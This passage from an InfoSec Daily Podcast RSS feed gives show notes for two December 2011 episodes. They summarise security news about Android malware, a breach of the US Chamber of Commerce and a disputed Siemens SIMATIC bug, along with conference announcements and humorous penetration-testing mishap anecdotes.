<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While the app is clean on the Android Market, those who download it from third party locations may end up with a piece of malware that sends out links to every contact in the infected phone&rsquo;s address book.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The links point to one of eighteen forums that bring tribute to</span><a href="http://en.wikipedia.org/wiki/Mohamed_Bouazizi"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Mohamed Bouaziz,</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> a Tunisian street vendor who on December 17, 2010, set himself on fire as a form of protest against local authorities. Since his act became a catalyst for the Tunisian revolution and the Arab Spring movement, websites that represent a tribute to him are meant to call the Muslim world to battle.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The rogue Android app also checks to see if the targeted mobile device is owned by someone in Bahrain and, if it is, it downloads a PDF document that represents an inquiry by the Bahrain Independent Commission of Inquiry on allegations of human rights violations.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.bloomberg.com/news/2011-12-22/cyber-attack-on-u-s-chamber-presses-congress-to-fix-web-rules.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.bloomberg.com/news/2011-12-22/cyber-attack-on-u-s-chamber-presses-congress-to-fix-web-rules.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A cyber attack on the U.S. Chamber of Commerce will intensify pressure on Congress to overhaul Web security regulations written before the existence of Facebook Inc., Twitter Inc. and Google Inc. Gmail.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Concern that computer systems for banks, power companies and Internet providers are vulnerable rose after hackers with ties to China stole confidential e-mails and documents from the chamber, the biggest U.S. business lobbying organization.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Congress and the administration have been dithering over cybersecurity for years,&rdquo; said Stewart Baker, a former assistant secretary for policy at the Homeland Security Department and a partner at the Steptoe &amp; Johnson LLP law firm in Washington. &ldquo;In that time, American companies have been robbed blind. This does underline, if any underlining is necessary, that we need a strong cybersecurity bill.&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Senate Majority Leader Harry Reid plans to take up cybersecurity legislation as early as next month to rewrite rules set after the terrorist attacks of Sept. 11, 2001. A U.S. report released last month found that China was the biggest hacker threat to American firms, and those attacks breached the networks of at least 760 companies.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The chamber breach, confirmed by the organization yesterday, shows that even House and Senate members may be vulnerable to foreign hackers, said Jessica Herrera-Flanigan, a former staff director for the House Homeland Security Committee, in an interview.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;This latest compromise should especially be of concern as the hackers potentially could have gotten hold of sensitive and strategic e-mails to and from the chamber and these officials,&rdquo; said Herrera-Flanigan, who&rsquo;s now a partner at Monument Policy Group in Washington.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.theregister.co.uk/2011/12/22/operation_elveden_police_woman_cuffed/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/12/22/operation_elveden_police_woman_cuffed/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A 52-year-old female police officer was the first cop to be arrested yesterday morning in connection with allegations of receiving illegal payments from journalists.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The unnamed suspect was questioned at an Essex police station before being bailed until a return date in April next year pending further inquiries, Scotland Yard said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">She was arrested &quot;on suspicion of misconduct in a public office and offences contrary to the Prevention of Corruption Act 1906.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s the eighth arrest under Operation Elveden &ndash; a police probe supervised by the Independent Police Complaints Commission that is linked to two other investigations.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Officers working on Operation Weeting are investigating alleged voicemail interception by people said to be working at &ndash; or on behalf of &ndash; the now-defunct News Corp-owned Sunday tabloid News of the World.</span><br />
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-552-elpdcisd-christmas-caroling-siemens-manning-logmein-free-islamic-compass-web-rule-rewrite-op-elveden/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3299/0/infosec-daily-podcast-episode-552.mp3" length="21576242" type="audio/mpeg" />
		<itunes:duration>0:44:54</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 552 for December 22, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.
	&#160;
Announcements:
No Show Tomorrow Night![...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 552 for December 22, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.
	&#160;
Announcements:
No Show Tomorrow Night! &#160;Next show will on December 27th.

	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://uk.ibtimes.com/articles/270736/20111221/siemens-lied-major-bugs-security-expert.htm
	Siemens has lied to the press about security bugs that could affect critical infrastructure, according to a security expert who has made public the password for Siemens&#39; machinery.
	Billy Rios is a security engineer for a software company and has written on his personal blog that Siemens&#39; SIMATIC systems can be easily hacked into and controlled remotely by anyone with an internet connection.
	Rios claims that Siemens PR told a Reuters reporter that &#34;there are no open issues regarding authentication bypass bugs at Siemens,&#34; contrary to what Rios believes. &#34;In May of this year,&#34; he writes, &#34;I reported an authentication bypass for Siemens SIMATIC systems. These systems are used to manage Industrial Control Systems and Critical Infrastructure. I&#39;ve been patiently waiting for a fix for the issue which affects pretty much every Siemens SIMATIC customer.&#34;
	&#8230;.
	Source: &#160;http://itunes.apple.com/us/app/logmein/id479229407?ls=1&#38;mt=8
	If you need remote access to your desktop from your iOS phone or tablet, now you can get there for free. Starting today, LogMeIn has a new app in the Apple App Store and it is free. 
	This replaces their low-end Ignition app that they previously charged $30 for. It doesn&#39;t give you everything that the current paid app provides, such as file management and cloud storage and HD video/audio streaming. But if you just need remote access, then the free app will do quite nicely. You of course need to run the free version (or the paid version) of LogMeIn on your Windows or Mac desktop, and set up an account online with them to complete the connection. What I like about LogMeIn is how they are upstanding guy[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 551 &#8211; Pentest Lessons, China Hacks Your Thermostat, Mind Control Virus, Cheap iPhones &amp; GPS Spoofing</title>
		<link>http://www.isdpodcast.com/episode-551-pentest-lessons-china-hacks-your-thermostat-mind-control-virus-cheap-iphones-gps-spoofing</link>
		<comments>http://www.isdpodcast.com/episode-551-pentest-lessons-china-hacks-your-thermostat-mind-control-virus-cheap-iphones-gps-spoofing#comments</comments>
		<pubDate>Thu, 22 Dec 2011 01:53:17 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3295</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 551 for December 21, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, and Varun Sharma. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 551 for December 21, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Karthik Rangarajan, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Unannouced</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Los Angeles area</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pentest Lessons:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adam Compton &amp; Zac Wagle&#39;s should get credit for the &quot;Pentest Lessons&quot; idea. They also started a twitter account: </span><a href="https://twitter.com/pentestlessons"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://twitter.com/pentestlessons</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 1:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Don&#39;t blindly follow the intern&#39;s suggestions.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 2:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Don&#39;t enable the firewall on a host you&#39;ve compromised without first checking the rules to see if you&#39;re going to block your own connection to the host.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Backstory:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> They popped a box via ColdFusion vuln and ran into an issue that required some network troubleshooting. The intern suggested turning on the firewall so they could use the logging to troubleshoot. They turn on the firewall and POP! No more connection. In addition, port 80 got blocked, so the customer&#39;s site went down as well. They had to call the customer to get the firewall turned back off.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 3:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Don&#39;t scan Polycom VOIP phones&#39; embedded web server with a web scanner or vulnerability scanner with web checks enabled. You will reboot every phone. The federal contractor I was working for had executives in all day conference calls with their government clients. Their conference calls were rudely cut short.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 4:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Your company&rsquo;s network is most secure when all of the employees are on vacation.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 5: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Do not copy content from one pentest report to another. Saving 10 minutes is not worth getting fired.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 6: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Do not copy a PDF from an OpenOffice Word to an Office XP into an Office 2011. Its hell to read for anyone else, and crashes systems. </span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://online.wsj.com/article/SB10001424052970204058404577110541568535300.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://online.wsj.com/article/SB10001424052970204058404577110541568535300.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In Beijing, Foreign Ministry spokesman Liu Weimin said at a daily briefing that he hadn&#39;t heard about the matter, though he repeated that Chinese law forbids hacker attacks. He added that China wants to cooperate more with the international community to prevent hacker attacks.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Chamber moved to shut down the hacking operation by unplugging and destroying some computers and overhauling its security system. The security revamp was timed for a 36-hour period over one weekend when the hackers, who kept regular working hours, were expected to be off duty.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Damage from data theft is often difficult to assess.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">People familiar with the Chamber investigation said it has been hard to determine what was taken before the incursion was discovered, or whether cyberspies used information gleaned from the Chamber to send booby-trapped emails to its members to gain a foothold in their computers, too.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Chamber officials said they scoured email known to be purloined and determined that communications with fewer than 50 of its members were compromised. They notified those members. People familiar with the investigation said the emails revealed the names of companies and key people in contact with the Chamber, as well as trade-policy documents, meeting notes, trip reports and schedules. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
